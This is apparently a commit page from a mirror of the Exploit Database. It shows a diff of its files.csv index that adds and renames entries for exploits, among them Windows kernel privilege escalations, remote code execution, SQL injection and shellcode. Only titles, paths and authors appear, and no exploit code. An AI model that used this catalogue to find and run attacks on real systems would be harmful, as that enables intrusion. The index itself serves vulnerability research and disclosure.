bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-12

Browse source 
16 new exploits

VMware 2.5.1 - (VMware-authd) Remote Denial of Service
VMware 2.5.1 - 'VMware-authd' Remote Denial of Service
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption
Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)
Boxoft Wav 1.0 - Buffer Overflow
VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow

EleCard MPEG PLAYER - '.m3u' Local Stack Overflow
Elecard MPEG Player - '.m3u' Local Stack Overflow

Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)

Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow
Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow
Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)
Firejail - Privilege Escalation

McAfee Virus Scan Enterprise for Linux - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution

Ansible 2.1.4 / 2.2.1 - Command Execution

Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation
EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation

PowerClan 1.14a - (footer.inc.php) Remote File Inclusion
PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion

Eggblog 3.1.0 - Cookies SQL Injection
EggBlog 3.1.0 - Cookies SQL Injection

eggBlog 4.0 - SQL Injection
EggBlog 4.0 - SQL Injection

2Capsule - 'sticker.php id' SQL Injection
2Capsule - SQL Injection

ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection
ASPThai.Net WebBoard 6.0 - SQL Injection
Memberkit 1.0 - Remote Arbitrary .PHP File Upload
phpScribe 0.9 - (user.cfg) Remote Config Disclosure
Memberkit 1.0 - Arbitrary File Upload
phpScribe 0.9 - 'user.cfg' Remote Config Disclosure

PowerClan 1.14a - (Authentication Bypass) SQL Injection
PowerClan 1.14a - Authentication Bypass

Webspell 4 - (Authentication Bypass) SQL Injection
webSPELL 4 - Authentication Bypass

eggBlog 4.1.1 - Local Directory Traversal
EggBlog 4.1.1 - Local Directory Traversal

Travel Portal Script Admin Password Change - Cross-Site Request Forgery
Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)

eggBlog 4.1.2 - Arbitrary File Upload
EggBlog 4.1.2 - Arbitrary File Upload
Eggblog 2.0 - blog.php id Parameter SQL Injection
Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting
EggBlog 2.0 - 'id' Parameter SQL Injection
EggBlog 2.0 - 'message' Parameter Cross-Site Scripting

PowerClan 1.14 - member.php SQL Injection
PowerClan 1.14 - 'member.php' SQL Injection
SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection
SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection
SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection

Dating Script 3.25 - SQL Injection

Starting Page 1.3 - SQL Injection
Starting Page 1.3 - 'linkid' Parameter SQL Injection
Starting Page 1.3 - 'category' Parameter SQL Injection
My link trader 1.1 - 'id' Parameter SQL Injection
Blackboard LMS 9.1 SP14 - Cross-Site Scripting
Huawei Flybox B660 - Cross-Site Request Forgery
Travel Portal Script 9.33 - SQL Injection
Movie Portal Script 7.35 - SQL Injection
This commit is contained in:
Offensive Security 2017-01-12 05:01:16 +00:00
parent 1b13c8a790
commit 3617e005f6
20 changed files with 2675 additions and 30 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
files.csv
View file

@ -892,7 +892,7 @@ id,file,description,date,author,platform,type,port
7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0
7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0
7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos,0
7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (VMware-authd) Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0
7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffié",multiple,dos,0
7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
@ -5335,6 +5335,10 @@ id,file,description,date,author,platform,type,port
40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5976,7 +5980,7 @@ id,file,description,date,author,platform,type,port
7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0
7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0
7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0
7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0
7853,platforms/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0
7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0
@ -8220,7 +8224,7 @@ id,file,description,date,author,platform,type,port
33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
@ -8436,7 +8440,7 @@ id,file,description,date,author,platform,type,port
37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0
37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
@ -8744,6 +8748,10 @@ id,file,description,date,author,platform,type,port
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15196,7 +15204,7 @@ id,file,description,date,author,platform,type,port
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
@ -15205,6 +15213,7 @@ id,file,description,date,author,platform,type,port
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16248,7 +16257,7 @@ id,file,description,date,author,platform,type,port
1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0
1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0
1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0
1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0
1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0
@ -17076,7 +17085,7 @@ id,file,description,date,author,platform,type,port
2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0
2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0
@ -18257,7 +18266,7 @@ id,file,description,date,author,platform,type,port
4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0
4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0
4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
4860,platforms/php/webapps/4860.pl,"EggBlog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
@ -18590,7 +18599,7 @@ id,file,description,date,author,platform,type,port
5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0
5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0
5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0
5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0
5336,platforms/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0
5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0
5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
@ -20393,20 +20402,20 @@ id,file,description,date,author,platform,type,port
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0
7631,platforms/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,php,webapps,0
7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0
7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps,0
7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps,0
7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0
7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps,0
7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Authentication Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0
7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
@ -20972,7 +20981,7 @@ id,file,description,date,author,platform,type,port
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
8652,platforms/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0
8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
@ -24069,7 +24078,7 @@ id,file,description,date,author,platform,type,port
15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0
15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0
15278,platforms/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0
@ -27297,7 +27306,7 @@ id,file,description,date,author,platform,type,port
25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0
25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0
25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0
25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0
25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0
25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0
25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
@ -28798,8 +28807,8 @@ id,file,description,date,author,platform,type,port
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0
27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 - blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0
27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0
27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0
27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0
27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0
27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0
27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0
@ -29189,7 +29198,7 @@ id,file,description,date,author,platform,type,port
27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0
27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0
27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0
27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - member.php SQL Injection",2006-04-13,d4igoro,php,webapps,0
27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,php,webapps,0
27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0
27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
